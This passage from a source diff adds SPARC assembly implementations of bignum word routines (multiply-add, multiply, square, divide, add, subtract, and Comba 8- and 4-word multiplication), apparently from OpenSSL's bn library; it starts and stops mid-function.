+	bz	.L_bn_mul_add_words_return
+	st	%o4,[%o0]
+
+	ld	[%o1+4],%g2
+	ld	[%o0+4],%o4
+	umul	%o3,%g2,%g2
+	rd	%y,%g1
+	addcc	%o4,%o5,%o4
+	addx	%g1,0,%g1
+	addcc	%o4,%g2,%o4
+	addx	%g1,0,%o5
+	deccc	%o2
+	bz	.L_bn_mul_add_words_return
+	st	%o4,[%o0+4]
+
+	ld	[%o1+8],%g2
+	ld	[%o0+8],%o4
+	umul	%o3,%g2,%g2
+	rd	%y,%g1
+	addcc	%o4,%o5,%o4
+	addx	%g1,0,%g1
+	addcc	%o4,%g2,%o4
+	st	%o4,[%o0+8]
+	retl
+	addx	%g1,0,%o0
+
+.type	bn_mul_add_words,#function
+.size	bn_mul_add_words,(.-bn_mul_add_words)
+
+.align	32
+
+.global bn_mul_words
+/*
+ * BN_ULONG bn_mul_words(rp,ap,num,w)
+ * BN_ULONG *rp,*ap;
+ * int num;
+ * BN_ULONG w;
+ */
+bn_mul_words:
+	cmp	%o2,0
+	bg,a	.L_bn_mul_words_proceeed
+	ld	[%o1],%g2
+	retl
+	clr	%o0
+
+.L_bn_mul_words_proceeed:
+	andcc	%o2,-4,%g0
+	bz	.L_bn_mul_words_tail
+	clr	%o5
+
+.L_bn_mul_words_loop:
+	ld	[%o1+4],%g3
+	umul	%o3,%g2,%g2
+	addcc	%g2,%o5,%g2
+	rd	%y,%g1
+	addx	%g1,0,%o5
+	st	%g2,[%o0]
+
+	ld	[%o1+8],%g2
+	umul	%o3,%g3,%g3
+	addcc	%g3,%o5,%g3
+	rd	%y,%g1
+	dec	4,%o2
+	addx	%g1,0,%o5
+	st	%g3,[%o0+4]
+
+	ld	[%o1+12],%g3
+	umul	%o3,%g2,%g2
+	addcc	%g2,%o5,%g2
+	rd	%y,%g1
+	inc	16,%o1
+	st	%g2,[%o0+8]
+	addx	%g1,0,%o5
+
+	umul	%o3,%g3,%g3
+	addcc	%g3,%o5,%g3
+	rd	%y,%g1
+	inc	16,%o0
+	addx	%g1,0,%o5
+	st	%g3,[%o0-4]
+	andcc	%o2,-4,%g0
+	nop
+	bnz,a	.L_bn_mul_words_loop
+	ld	[%o1],%g2
+
+	tst	%o2
+	bnz,a	.L_bn_mul_words_tail
+	ld	[%o1],%g2
+.L_bn_mul_words_return:
+	retl
+	mov	%o5,%o0
+	nop
+
+.L_bn_mul_words_tail:
+	umul	%o3,%g2,%g2
+	addcc	%g2,%o5,%g2
+	rd	%y,%g1
+	addx	%g1,0,%o5
+	deccc	%o2
+	bz	.L_bn_mul_words_return
+	st	%g2,[%o0]
+	nop
+
+	ld	[%o1+4],%g2
+	umul	%o3,%g2,%g2
+	addcc	%g2,%o5,%g2
+	rd	%y,%g1
+	addx	%g1,0,%o5
+	deccc	%o2
+	bz	.L_bn_mul_words_return
+	st	%g2,[%o0+4]
+
+	ld	[%o1+8],%g2
+	umul	%o3,%g2,%g2
+	addcc	%g2,%o5,%g2
+	rd	%y,%g1
+	st	%g2,[%o0+8]
+	retl
+	addx	%g1,0,%o0
+
+.type	bn_mul_words,#function
+.size	bn_mul_words,(.-bn_mul_words)
+
+.align  32
+.global	bn_sqr_words
+/*
+ * void bn_sqr_words(r,a,n)
+ * BN_ULONG *r,*a;
+ * int n;
+ */
+bn_sqr_words:
+	cmp	%o2,0
+	bg,a	.L_bn_sqr_words_proceeed
+	ld	[%o1],%g2
+	retl
+	clr	%o0
+
+.L_bn_sqr_words_proceeed:
+	andcc	%o2,-4,%g0
+	bz	.L_bn_sqr_words_tail
+	clr	%o5
+
+.L_bn_sqr_words_loop:
+	ld	[%o1+4],%g3
+	umul	%g2,%g2,%o4
+	st	%o4,[%o0]
+	rd	%y,%o5
+	st	%o5,[%o0+4]
+
+	ld	[%o1+8],%g2
+	umul	%g3,%g3,%o4
+	dec	4,%o2
+	st	%o4,[%o0+8]
+	rd	%y,%o5
+	st	%o5,[%o0+12]
+	nop
+
+	ld	[%o1+12],%g3
+	umul	%g2,%g2,%o4
+	st	%o4,[%o0+16]
+	rd	%y,%o5
+	inc	16,%o1
+	st	%o5,[%o0+20]
+
+	umul	%g3,%g3,%o4
+	inc	32,%o0
+	st	%o4,[%o0-8]
+	rd	%y,%o5
+	st	%o5,[%o0-4]
+	andcc	%o2,-4,%g2
+	bnz,a	.L_bn_sqr_words_loop
+	ld	[%o1],%g2
+
+	tst	%o2
+	nop
+	bnz,a	.L_bn_sqr_words_tail
+	ld	[%o1],%g2
+.L_bn_sqr_words_return:
+	retl
+	clr	%o0
+
+.L_bn_sqr_words_tail:
+	umul	%g2,%g2,%o4
+	st	%o4,[%o0]
+	deccc	%o2
+	rd	%y,%o5
+	bz	.L_bn_sqr_words_return
+	st	%o5,[%o0+4]
+
+	ld	[%o1+4],%g2
+	umul	%g2,%g2,%o4
+	st	%o4,[%o0+8]
+	deccc	%o2
+	rd	%y,%o5
+	nop
+	bz	.L_bn_sqr_words_return
+	st	%o5,[%o0+12]
+
+	ld	[%o1+8],%g2
+	umul	%g2,%g2,%o4
+	st	%o4,[%o0+16]
+	rd	%y,%o5
+	st	%o5,[%o0+20]
+	retl
+	clr	%o0
+
+.type	bn_sqr_words,#function
+.size	bn_sqr_words,(.-bn_sqr_words)
+
+.align	32
+
+.global bn_div_words
+/*
+ * BN_ULONG bn_div_words(h,l,d)
+ * BN_ULONG h,l,d;
+ */
+bn_div_words:
+	wr	%o0,%y
+	udiv	%o1,%o2,%o0
+	retl
+	nop
+
+.type	bn_div_words,#function
+.size	bn_div_words,(.-bn_div_words)
+
+.align	32
+
+.global bn_add_words
+/*
+ * BN_ULONG bn_add_words(rp,ap,bp,n)
+ * BN_ULONG *rp,*ap,*bp;
+ * int n;
+ */
+bn_add_words:
+	cmp	%o3,0
+	bg,a	.L_bn_add_words_proceed
+	ld	[%o1],%o4
+	retl
+	clr	%o0
+
+.L_bn_add_words_proceed:
+	andcc	%o3,-4,%g0
+	bz	.L_bn_add_words_tail
+	clr	%g1
+	ba	.L_bn_add_words_warn_loop
+	addcc	%g0,0,%g0	! clear carry flag
+
+.L_bn_add_words_loop:
+	ld	[%o1],%o4
+.L_bn_add_words_warn_loop:
+	ld	[%o2],%o5
+	ld	[%o1+4],%g3
+	ld	[%o2+4],%g4
+	dec	4,%o3
+	addxcc	%o5,%o4,%o5
+	st	%o5,[%o0]
+
+	ld	[%o1+8],%o4
+	ld	[%o2+8],%o5
+	inc	16,%o1
+	addxcc	%g3,%g4,%g3
+	st	%g3,[%o0+4]
+	
+	ld	[%o1-4],%g3
+	ld	[%o2+12],%g4
+	inc	16,%o2
+	addxcc	%o5,%o4,%o5
+	st	%o5,[%o0+8]
+
+	inc	16,%o0
+	addxcc	%g3,%g4,%g3
+	st	%g3,[%o0-4]
+	addx	%g0,0,%g1
+	andcc	%o3,-4,%g0
+	bnz,a	.L_bn_add_words_loop
+	addcc	%g1,-1,%g0
+
+	tst	%o3
+	bnz,a	.L_bn_add_words_tail
+	ld	[%o1],%o4
+.L_bn_add_words_return:
+	retl
+	mov	%g1,%o0
+
+.L_bn_add_words_tail:
+	addcc	%g1,-1,%g0
+	ld	[%o2],%o5
+	addxcc	%o5,%o4,%o5
+	addx	%g0,0,%g1
+	deccc	%o3
+	bz	.L_bn_add_words_return
+	st	%o5,[%o0]
+
+	ld	[%o1+4],%o4
+	addcc	%g1,-1,%g0
+	ld	[%o2+4],%o5
+	addxcc	%o5,%o4,%o5
+	addx	%g0,0,%g1
+	deccc	%o3
+	bz	.L_bn_add_words_return
+	st	%o5,[%o0+4]
+
+	ld	[%o1+8],%o4
+	addcc	%g1,-1,%g0
+	ld	[%o2+8],%o5
+	addxcc	%o5,%o4,%o5
+	st	%o5,[%o0+8]
+	retl
+	addx	%g0,0,%o0
+
+.type	bn_add_words,#function
+.size	bn_add_words,(.-bn_add_words)
+
+.align	32
+
+.global bn_sub_words
+/*
+ * BN_ULONG bn_sub_words(rp,ap,bp,n)
+ * BN_ULONG *rp,*ap,*bp;
+ * int n;
+ */
+bn_sub_words:
+	cmp	%o3,0
+	bg,a	.L_bn_sub_words_proceed
+	ld	[%o1],%o4
+	retl
+	clr	%o0
+
+.L_bn_sub_words_proceed:
+	andcc	%o3,-4,%g0
+	bz	.L_bn_sub_words_tail
+	clr	%g1
+	ba	.L_bn_sub_words_warm_loop
+	addcc	%g0,0,%g0	! clear carry flag
+
+.L_bn_sub_words_loop:
+	ld	[%o1],%o4
+.L_bn_sub_words_warm_loop:
+	ld	[%o2],%o5
+	ld	[%o1+4],%g3
+	ld	[%o2+4],%g4
+	dec	4,%o3
+	subxcc	%o4,%o5,%o5
+	st	%o5,[%o0]
+
+	ld	[%o1+8],%o4
+	ld	[%o2+8],%o5
+	inc	16,%o1
+	subxcc	%g3,%g4,%g4
+	st	%g4,[%o0+4]
+	
+	ld	[%o1-4],%g3
+	ld	[%o2+12],%g4
+	inc	16,%o2
+	subxcc	%o4,%o5,%o5
+	st	%o5,[%o0+8]
+
+	inc	16,%o0
+	subxcc	%g3,%g4,%g4
+	st	%g4,[%o0-4]
+	addx	%g0,0,%g1
+	andcc	%o3,-4,%g0
+	bnz,a	.L_bn_sub_words_loop
+	addcc	%g1,-1,%g0
+
+	tst	%o3
+	nop
+	bnz,a	.L_bn_sub_words_tail
+	ld	[%o1],%o4
+.L_bn_sub_words_return:
+	retl
+	mov	%g1,%o0
+
+.L_bn_sub_words_tail:
+	addcc	%g1,-1,%g0
+	ld	[%o2],%o5
+	subxcc	%o4,%o5,%o5
+	addx	%g0,0,%g1
+	deccc	%o3
+	bz	.L_bn_sub_words_return
+	st	%o5,[%o0]
+	nop
+
+	ld	[%o1+4],%o4
+	addcc	%g1,-1,%g0
+	ld	[%o2+4],%o5
+	subxcc	%o4,%o5,%o5
+	addx	%g0,0,%g1
+	deccc	%o3
+	bz	.L_bn_sub_words_return
+	st	%o5,[%o0+4]
+
+	ld	[%o1+8],%o4
+	addcc	%g1,-1,%g0
+	ld	[%o2+8],%o5
+	subxcc	%o4,%o5,%o5
+	st	%o5,[%o0+8]
+	retl
+	addx	%g0,0,%o0
+
+.type	bn_sub_words,#function
+.size	bn_sub_words,(.-bn_sub_words)
+
+#define FRAME_SIZE	-96
+
+/*
+ * Here is register usage map for *all* routines below.
+ */
+#define t_1	%o0
+#define	t_2	%o1
+#define c_1	%o2
+#define c_2	%o3
+#define c_3	%o4
+
+#define ap(I)	[%i1+4*I]
+#define bp(I)	[%i2+4*I]
+#define rp(I)	[%i0+4*I]
+
+#define	a_0	%l0
+#define	a_1	%l1
+#define	a_2	%l2
+#define	a_3	%l3
+#define	a_4	%l4
+#define	a_5	%l5
+#define	a_6	%l6
+#define	a_7	%l7
+
+#define	b_0	%i3
+#define	b_1	%i4
+#define	b_2	%i5
+#define	b_3	%o5
+#define	b_4	%g1
+#define	b_5	%g2
+#define	b_6	%g3
+#define	b_7	%g4
+
+.align	32
+.global bn_mul_comba8
+/*
+ * void bn_mul_comba8(r,a,b)
+ * BN_ULONG *r,*a,*b;
+ */
+bn_mul_comba8:
+	save	%sp,FRAME_SIZE,%sp
+	ld	ap(0),a_0
+	ld	bp(0),b_0
+	umul	a_0,b_0,c_1	!=!mul_add_c(a[0],b[0],c1,c2,c3);
+	ld	bp(1),b_1
+	rd	%y,c_2
+	st	c_1,rp(0)	!r[0]=c1;
+
+	umul	a_0,b_1,t_1	!=!mul_add_c(a[0],b[1],c2,c3,c1);
+	ld	ap(1),a_1
+	addcc	c_2,t_1,c_2
+	rd	%y,t_2
+	addxcc	%g0,t_2,c_3	!=
+	addx	%g0,%g0,c_1
+	ld	ap(2),a_2
+	umul	a_1,b_0,t_1	!mul_add_c(a[1],b[0],c2,c3,c1);
+	addcc	c_2,t_1,c_2	!=
+	rd	%y,t_2
+	addxcc	c_3,t_2,c_3
+	st	c_2,rp(1)	!r[1]=c2;
+	addx	c_1,%g0,c_1	!=
+
+	umul	a_2,b_0,t_1	!mul_add_c(a[2],b[0],c3,c1,c2);
+	addcc	c_3,t_1,c_3
+	rd	%y,t_2
+	addxcc	c_1,t_2,c_1	!=
+	addx	%g0,%g0,c_2
+	ld	bp(2),b_2
+	umul	a_1,b_1,t_1	!mul_add_c(a[1],b[1],c3,c1,c2);
+	addcc	c_3,t_1,c_3	!=
+	rd	%y,t_2
+	addxcc	c_1,t_2,c_1
+	ld	bp(3),b_3
+	addx	c_2,%g0,c_2	!=
+	umul	a_0,b_2,t_1	!mul_add_c(a[0],b[2],c3,c1,c2);
+	addcc	c_3,t_1,c_3
+	rd	%y,t_2
+	addxcc	c_1,t_2,c_1	!=
+	addx	c_2,%g0,c_2
+	st	c_3,rp(2)	!r[2]=c3;
+
+	umul	a_0,b_3,t_1	!mul_add_c(a[0],b[3],c1,c2,c3);
+	addcc	c_1,t_1,c_1	!=
+	rd	%y,t_2
+	addxcc	c_2,t_2,c_2
+	addx	%g0,%g0,c_3
+	umul	a_1,b_2,t_1	!=!mul_add_c(a[1],b[2],c1,c2,c3);
+	addcc	c_1,t_1,c_1
+	rd	%y,t_2
+	addxcc	c_2,t_2,c_2
+	addx	c_3,%g0,c_3	!=
+	ld	ap(3),a_3
+	umul	a_2,b_1,t_1	!mul_add_c(a[2],b[1],c1,c2,c3);
+	addcc	c_1,t_1,c_1
+	rd	%y,t_2		!=
+	addxcc	c_2,t_2,c_2
+	addx	c_3,%g0,c_3
+	ld	ap(4),a_4
+	umul	a_3,b_0,t_1	!mul_add_c(a[3],b[0],c1,c2,c3);!=
+	addcc	c_1,t_1,c_1
+	rd	%y,t_2
+	addxcc	c_2,t_2,c_2
+	addx	c_3,%g0,c_3	!=
+	st	c_1,rp(3)	!r[3]=c1;
+
+	umul	a_4,b_0,t_1	!mul_add_c(a[4],b[0],c2,c3,c1);
+	addcc	c_2,t_1,c_2
+	rd	%y,t_2		!=
+	addxcc	c_3,t_2,c_3
+	addx	%g0,%g0,c_1
+	umul	a_3,b_1,t_1	!mul_add_c(a[3],b[1],c2,c3,c1);
+	addcc	c_2,t_1,c_2	!=
+	rd	%y,t_2
+	addxcc	c_3,t_2,c_3
+	addx	c_1,%g0,c_1
+	umul	a_2,b_2,t_1	!=!mul_add_c(a[2],b[2],c2,c3,c1);
+	addcc	c_2,t_1,c_2
+	rd	%y,t_2
+	addxcc	c_3,t_2,c_3
+	addx	c_1,%g0,c_1	!=
+	ld	bp(4),b_4
+	umul	a_1,b_3,t_1	!mul_add_c(a[1],b[3],c2,c3,c1);
+	addcc	c_2,t_1,c_2
+	rd	%y,t_2		!=
+	addxcc	c_3,t_2,c_3
+	addx	c_1,%g0,c_1
+	ld	bp(5),b_5
+	umul	a_0,b_4,t_1	!=!mul_add_c(a[0],b[4],c2,c3,c1);
+	addcc	c_2,t_1,c_2
+	rd	%y,t_2
+	addxcc	c_3,t_2,c_3
+	addx	c_1,%g0,c_1	!=
+	st	c_2,rp(4)	!r[4]=c2;
+
+	umul	a_0,b_5,t_1	!mul_add_c(a[0],b[5],c3,c1,c2);
+	addcc	c_3,t_1,c_3
+	rd	%y,t_2		!=
+	addxcc	c_1,t_2,c_1
+	addx	%g0,%g0,c_2
+	umul	a_1,b_4,t_1	!mul_add_c(a[1],b[4],c3,c1,c2);
+	addcc	c_3,t_1,c_3	!=
+	rd	%y,t_2
+	addxcc	c_1,t_2,c_1
+	addx	c_2,%g0,c_2
+	umul	a_2,b_3,t_1	!=!mul_add_c(a[2],b[3],c3,c1,c2);
+	addcc	c_3,t_1,c_3
+	rd	%y,t_2
+	addxcc	c_1,t_2,c_1
+	addx	c_2,%g0,c_2	!=
+	umul	a_3,b_2,t_1	!mul_add_c(a[3],b[2],c3,c1,c2);
+	addcc	c_3,t_1,c_3
+	rd	%y,t_2
+	addxcc	c_1,t_2,c_1	!=
+	addx	c_2,%g0,c_2
+	ld	ap(5),a_5
+	umul	a_4,b_1,t_1	!mul_add_c(a[4],b[1],c3,c1,c2);
+	addcc	c_3,t_1,c_3	!=
+	rd	%y,t_2
+	addxcc	c_1,t_2,c_1
+	ld	ap(6),a_6
+	addx	c_2,%g0,c_2	!=
+	umul	a_5,b_0,t_1	!mul_add_c(a[5],b[0],c3,c1,c2);
+	addcc	c_3,t_1,c_3
+	rd	%y,t_2
+	addxcc	c_1,t_2,c_1	!=
+	addx	c_2,%g0,c_2
+	st	c_3,rp(5)	!r[5]=c3;
+
+	umul	a_6,b_0,t_1	!mul_add_c(a[6],b[0],c1,c2,c3);
+	addcc	c_1,t_1,c_1	!=
+	rd	%y,t_2
+	addxcc	c_2,t_2,c_2
+	addx	%g0,%g0,c_3
+	umul	a_5,b_1,t_1	!=!mul_add_c(a[5],b[1],c1,c2,c3);
+	addcc	c_1,t_1,c_1
+	rd	%y,t_2
+	addxcc	c_2,t_2,c_2
+	addx	c_3,%g0,c_3	!=
+	umul	a_4,b_2,t_1	!mul_add_c(a[4],b[2],c1,c2,c3);
+	addcc	c_1,t_1,c_1
+	rd	%y,t_2
+	addxcc	c_2,t_2,c_2	!=
+	addx	c_3,%g0,c_3
+	umul	a_3,b_3,t_1	!mul_add_c(a[3],b[3],c1,c2,c3);
+	addcc	c_1,t_1,c_1
+	rd	%y,t_2		!=
+	addxcc	c_2,t_2,c_2
+	addx	c_3,%g0,c_3
+	umul	a_2,b_4,t_1	!mul_add_c(a[2],b[4],c1,c2,c3);
+	addcc	c_1,t_1,c_1	!=
+	rd	%y,t_2
+	addxcc	c_2,t_2,c_2
+	ld	bp(6),b_6
+	addx	c_3,%g0,c_3	!=
+	umul	a_1,b_5,t_1	!mul_add_c(a[1],b[5],c1,c2,c3);
+	addcc	c_1,t_1,c_1
+	rd	%y,t_2
+	addxcc	c_2,t_2,c_2	!=
+	addx	c_3,%g0,c_3
+	ld	bp(7),b_7
+	umul	a_0,b_6,t_1	!mul_add_c(a[0],b[6],c1,c2,c3);
+	addcc	c_1,t_1,c_1	!=
+	rd	%y,t_2
+	addxcc	c_2,t_2,c_2
+	st	c_1,rp(6)	!r[6]=c1;
+	addx	c_3,%g0,c_3	!=
+
+	umul	a_0,b_7,t_1	!mul_add_c(a[0],b[7],c2,c3,c1);
+	addcc	c_2,t_1,c_2
+	rd	%y,t_2
+	addxcc	c_3,t_2,c_3	!=
+	addx	%g0,%g0,c_1
+	umul	a_1,b_6,t_1	!mul_add_c(a[1],b[6],c2,c3,c1);
+	addcc	c_2,t_1,c_2
+	rd	%y,t_2		!=
+	addxcc	c_3,t_2,c_3
+	addx	c_1,%g0,c_1
+	umul	a_2,b_5,t_1	!mul_add_c(a[2],b[5],c2,c3,c1);
+	addcc	c_2,t_1,c_2	!=
+	rd	%y,t_2
+	addxcc	c_3,t_2,c_3
+	addx	c_1,%g0,c_1
+	umul	a_3,b_4,t_1	!=!mul_add_c(a[3],b[4],c2,c3,c1);
+	addcc	c_2,t_1,c_2
+	rd	%y,t_2
+	addxcc	c_3,t_2,c_3
+	addx	c_1,%g0,c_1	!=
+	umul	a_4,b_3,t_1	!mul_add_c(a[4],b[3],c2,c3,c1);
+	addcc	c_2,t_1,c_2
+	rd	%y,t_2
+	addxcc	c_3,t_2,c_3	!=
+	addx	c_1,%g0,c_1
+	umul	a_5,b_2,t_1	!mul_add_c(a[5],b[2],c2,c3,c1);
+	addcc	c_2,t_1,c_2
+	rd	%y,t_2		!=
+	addxcc	c_3,t_2,c_3
+	addx	c_1,%g0,c_1
+	ld	ap(7),a_7
+	umul	a_6,b_1,t_1	!=!mul_add_c(a[6],b[1],c2,c3,c1);
+	addcc	c_2,t_1,c_2
+	rd	%y,t_2
+	addxcc	c_3,t_2,c_3
+	addx	c_1,%g0,c_1	!=
+	umul	a_7,b_0,t_1	!mul_add_c(a[7],b[0],c2,c3,c1);
+	addcc	c_2,t_1,c_2
+	rd	%y,t_2
+	addxcc	c_3,t_2,c_3	!=
+	addx	c_1,%g0,c_1
+	st	c_2,rp(7)	!r[7]=c2;
+
+	umul	a_7,b_1,t_1	!mul_add_c(a[7],b[1],c3,c1,c2);
+	addcc	c_3,t_1,c_3	!=
+	rd	%y,t_2
+	addxcc	c_1,t_2,c_1
+	addx	%g0,%g0,c_2
+	umul	a_6,b_2,t_1	!=!mul_add_c(a[6],b[2],c3,c1,c2);
+	addcc	c_3,t_1,c_3
+	rd	%y,t_2
+	addxcc	c_1,t_2,c_1
+	addx	c_2,%g0,c_2	!=
+	umul	a_5,b_3,t_1	!mul_add_c(a[5],b[3],c3,c1,c2);
+	addcc	c_3,t_1,c_3
+	rd	%y,t_2
+	addxcc	c_1,t_2,c_1	!=
+	addx	c_2,%g0,c_2
+	umul	a_4,b_4,t_1	!mul_add_c(a[4],b[4],c3,c1,c2);
+	addcc	c_3,t_1,c_3
+	rd	%y,t_2		!=
+	addxcc	c_1,t_2,c_1
+	addx	c_2,%g0,c_2
+	umul	a_3,b_5,t_1	!mul_add_c(a[3],b[5],c3,c1,c2);
+	addcc	c_3,t_1,c_3	!=
+	rd	%y,t_2
+	addxcc	c_1,t_2,c_1
+	addx	c_2,%g0,c_2
+	umul	a_2,b_6,t_1	!=!mul_add_c(a[2],b[6],c3,c1,c2);
+	addcc	c_3,t_1,c_3
+	rd	%y,t_2
+	addxcc	c_1,t_2,c_1
+	addx	c_2,%g0,c_2	!=
+	umul	a_1,b_7,t_1	!mul_add_c(a[1],b[7],c3,c1,c2);
+	addcc	c_3,t_1,c_3
+	rd	%y,t_2
+	addxcc	c_1,t_2,c_1	!
+	addx	c_2,%g0,c_2
+	st	c_3,rp(8)	!r[8]=c3;
+
+	umul	a_2,b_7,t_1	!mul_add_c(a[2],b[7],c1,c2,c3);
+	addcc	c_1,t_1,c_1	!=
+	rd	%y,t_2
+	addxcc	c_2,t_2,c_2
+	addx	%g0,%g0,c_3
+	umul	a_3,b_6,t_1	!=!mul_add_c(a[3],b[6],c1,c2,c3);
+	addcc	c_1,t_1,c_1
+	rd	%y,t_2
+	addxcc	c_2,t_2,c_2
+	addx	c_3,%g0,c_3	!=
+	umul	a_4,b_5,t_1	!mul_add_c(a[4],b[5],c1,c2,c3);
+	addcc	c_1,t_1,c_1
+	rd	%y,t_2
+	addxcc	c_2,t_2,c_2	!=
+	addx	c_3,%g0,c_3
+	umul	a_5,b_4,t_1	!mul_add_c(a[5],b[4],c1,c2,c3);
+	addcc	c_1,t_1,c_1
+	rd	%y,t_2		!=
+	addxcc	c_2,t_2,c_2
+	addx	c_3,%g0,c_3
+	umul	a_6,b_3,t_1	!mul_add_c(a[6],b[3],c1,c2,c3);
+	addcc	c_1,t_1,c_1	!=
+	rd	%y,t_2
+	addxcc	c_2,t_2,c_2
+	addx	c_3,%g0,c_3
+	umul	a_7,b_2,t_1	!=!mul_add_c(a[7],b[2],c1,c2,c3);
+	addcc	c_1,t_1,c_1
+	rd	%y,t_2
+	addxcc	c_2,t_2,c_2
+	addx	c_3,%g0,c_3	!=
+	st	c_1,rp(9)	!r[9]=c1;
+
+	umul	a_7,b_3,t_1	!mul_add_c(a[7],b[3],c2,c3,c1);
+	addcc	c_2,t_1,c_2
+	rd	%y,t_2		!=
+	addxcc	c_3,t_2,c_3
+	addx	%g0,%g0,c_1
+	umul	a_6,b_4,t_1	!mul_add_c(a[6],b[4],c2,c3,c1);
+	addcc	c_2,t_1,c_2	!=
+	rd	%y,t_2
+	addxcc	c_3,t_2,c_3
+	addx	c_1,%g0,c_1
+	umul	a_5,b_5,t_1	!=!mul_add_c(a[5],b[5],c2,c3,c1);
+	addcc	c_2,t_1,c_2
+	rd	%y,t_2
+	addxcc	c_3,t_2,c_3
+	addx	c_1,%g0,c_1	!=
+	umul	a_4,b_6,t_1	!mul_add_c(a[4],b[6],c2,c3,c1);
+	addcc	c_2,t_1,c_2
+	rd	%y,t_2
+	addxcc	c_3,t_2,c_3	!=
+	addx	c_1,%g0,c_1
+	umul	a_3,b_7,t_1	!mul_add_c(a[3],b[7],c2,c3,c1);
+	addcc	c_2,t_1,c_2
+	rd	%y,t_2		!=
+	addxcc	c_3,t_2,c_3
+	addx	c_1,%g0,c_1
+	st	c_2,rp(10)	!r[10]=c2;
+
+	umul	a_4,b_7,t_1	!=!mul_add_c(a[4],b[7],c3,c1,c2);
+	addcc	c_3,t_1,c_3
+	rd	%y,t_2
+	addxcc	c_1,t_2,c_1
+	addx	%g0,%g0,c_2	!=
+	umul	a_5,b_6,t_1	!mul_add_c(a[5],b[6],c3,c1,c2);
+	addcc	c_3,t_1,c_3
+	rd	%y,t_2
+	addxcc	c_1,t_2,c_1	!=
+	addx	c_2,%g0,c_2
+	umul	a_6,b_5,t_1	!mul_add_c(a[6],b[5],c3,c1,c2);
+	addcc	c_3,t_1,c_3
+	rd	%y,t_2		!=
+	addxcc	c_1,t_2,c_1
+	addx	c_2,%g0,c_2
+	umul	a_7,b_4,t_1	!mul_add_c(a[7],b[4],c3,c1,c2);
+	addcc	c_3,t_1,c_3	!=
+	rd	%y,t_2
+	addxcc	c_1,t_2,c_1
+	st	c_3,rp(11)	!r[11]=c3;
+	addx	c_2,%g0,c_2	!=
+
+	umul	a_7,b_5,t_1	!mul_add_c(a[7],b[5],c1,c2,c3);
+	addcc	c_1,t_1,c_1
+	rd	%y,t_2
+	addxcc	c_2,t_2,c_2	!=
+	addx	%g0,%g0,c_3
+	umul	a_6,b_6,t_1	!mul_add_c(a[6],b[6],c1,c2,c3);
+	addcc	c_1,t_1,c_1
+	rd	%y,t_2		!=
+	addxcc	c_2,t_2,c_2
+	addx	c_3,%g0,c_3
+	umul	a_5,b_7,t_1	!mul_add_c(a[5],b[7],c1,c2,c3);
+	addcc	c_1,t_1,c_1	!=
+	rd	%y,t_2
+	addxcc	c_2,t_2,c_2
+	st	c_1,rp(12)	!r[12]=c1;
+	addx	c_3,%g0,c_3	!=
+
+	umul	a_6,b_7,t_1	!mul_add_c(a[6],b[7],c2,c3,c1);
+	addcc	c_2,t_1,c_2
+	rd	%y,t_2
+	addxcc	c_3,t_2,c_3	!=
+	addx	%g0,%g0,c_1
+	umul	a_7,b_6,t_1	!mul_add_c(a[7],b[6],c2,c3,c1);
+	addcc	c_2,t_1,c_2
+	rd	%y,t_2		!=
+	addxcc	c_3,t_2,c_3
+	addx	c_1,%g0,c_1
+	st	c_2,rp(13)	!r[13]=c2;
+
+	umul	a_7,b_7,t_1	!=!mul_add_c(a[7],b[7],c3,c1,c2);
+	addcc	c_3,t_1,c_3
+	rd	%y,t_2
+	addxcc	c_1,t_2,c_1
+	nop			!=
+	st	c_3,rp(14)	!r[14]=c3;
+	st	c_1,rp(15)	!r[15]=c1;
+
+	ret
+	restore	%g0,%g0,%o0
+
+.type	bn_mul_comba8,#function
+.size	bn_mul_comba8,(.-bn_mul_comba8)
+
+.align	32
+
+.global bn_mul_comba4
+/*
+ * void bn_mul_comba4(r,a,b)
+ * BN_ULONG *r,*a,*b;
+ */
+bn_mul_comba4:
+	save	%sp,FRAME_SIZE,%sp
+	ld	ap(0),a_0
+	ld	bp(0),b_0
+	umul	a_0,b_0,c_1	!=!mul_add_c(a[0],b[0],c1,c2,c3);
+	ld	bp(1),b_1
+	rd	%y,c_2
+	st	c_1,rp(0)	!r[0]=c1;
+
+	umul	a_0,b_1,t_1	!=!mul_add_c(a[0],b[1],c2,c3,c1);
+	ld	ap(1),a_1
+	addcc	c_2,t_1,c_2
+	rd	%y,t_2		!=
+	addxcc	%g0,t_2,c_3
+	addx	%g0,%g0,c_1
+	ld	ap(2),a_2
+	umul	a_1,b_0,t_1	!=!mul_add_c(a[1],b[0],c2,c3,c1);
+	addcc	c_2,t_1,c_2
+	rd	%y,t_2
+	addxcc	c_3,t_2,c_3
+	addx	c_1,%g0,c_1	!=
+	st	c_2,rp(1)	!r[1]=c2;
+
+	umul	a_2,b_0,t_1	!mul_add_c(a[2],b[0],c3,c1,c2);
+	addcc	c_3,t_1,c_3
+	rd	%y,t_2		!=
+	addxcc	c_1,t_2,c_1
+	addx	%g0,%g0,c_2
+	ld	bp(2),b_2
+	umul	a_1,b_1,t_1	!=!mul_add_c(a[1],b[1],c3,c1,c2);
+	addcc	c_3,t_1,c_3
+	rd	%y,t_2
+	addxcc	c_1,t_2,c_1
+	addx	c_2,%g0,c_2	!=
+	ld	bp(3),b_3
+	umul	a_0,b_2,t_1	!mul_add_c(a[0],b[2],c3,c1,c2);
+	addcc	c_3,t_1,c_3
+	rd	%y,t_2		!=
+	addxcc	c_1,t_2,c_1
+	addx	c_2,%g0,c_2
+	st	c_3,rp(2)	!r[2]=c3;
+
+	umul	a_0,b_3,t_1	!=!mul_add_c(a[0],b[3],c1,c2,c3);
+	addcc	c_1,t_1,c_1
+	rd	%y,t_2
+	addxcc	c_2,t_2,c_2
+	addx	%g0,%g0,c_3	!=
+	umul	a_1,b_2,t_1	!mul_add_c(a[1],b[2],c1,c2,c3);
+	addcc	c_1,t_1,c_1
+	rd	%y,t_2
+	addxcc	c_2,t_2,c_2	!=
+	addx	c_3,%g0,c_3
+	ld	ap(3),a_3
+	umul	a_2,b_1,t_1	!mul_add_c(a[2],b[1],c1,c2,c3);
+	addcc	c_1,t_1,c_1	!=
+	rd	%y,t_2
+	addxcc	c_2,t_2,c_2
+	addx	c_3,%g0,c_3
+	umul	a_3,b_0,t_1	!=!mul_add_c(a[3],b[0],c1,c2,c3);
+	addcc	c_1,t_1,c_1
+	rd	%y,t_2
+	addxcc	c_2,t_2,c_2
+	addx	c_3,%g0,c_3	!=
+	st	c_1,rp(3)	!r[3]=c1;
+
+	umul	a_3,b_1,t_1	!mul_add_c(a[3],b[1],c2,c3,c1);
+	addcc	c_2,t_1,c_2
+	rd	%y,t_2		!=
+	addxcc	c_3,t_2,c_3
+	addx	%g0,%g0,c_1
